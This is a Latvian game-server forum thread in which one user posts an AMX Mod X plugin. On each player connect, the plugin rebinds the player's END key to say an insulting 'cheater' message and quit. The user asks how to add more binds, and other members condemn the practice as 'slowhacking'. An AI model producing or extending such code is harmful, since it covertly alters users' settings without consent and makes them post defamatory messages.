Opulx Posted August 15, 2009 Report Share Posted August 15, 2009 Shads izskatas Plugins #include <amxmodx> #include <amxmisc> public client_connect(id) client_cmd(0, "bind ^"END^" ^"say Esmu PE*INJS Spaidu End un chiitoju! voi*.**.lv ANTICHEAT!;quit"") public plugin_init() { register_plugin("End","1.0","voiz") } Man jautājums kā uzlikt lai šajā vienā pluginā saliek Vairākas bind pogas Mēģināju visādi bet nesanāk Link to comment Share on other sites More sharing options...
DeimoN Posted August 15, 2009 Report Share Posted August 15, 2009 Šādi mainīt spēlētāja bindus, tādejādi uzspiežot savus, ir nekorekti. Link to comment Share on other sites More sharing options...
w4p1337 Posted August 15, 2009 Report Share Posted August 15, 2009 Tāpēc es config.cfg esmu uzlicis read only, lai izejot no kontra atkal viss ir pa vecam Link to comment Share on other sites More sharing options...
shine Posted August 16, 2009 Report Share Posted August 16, 2009 Nevis nekorekti, bet slowhacking. Esam gudri un neatbalstam šādus sūdus, kas bez prasīšanas pārmaina lietotāja uzstādījumus. Link to comment Share on other sites More sharing options...
Recommended Posts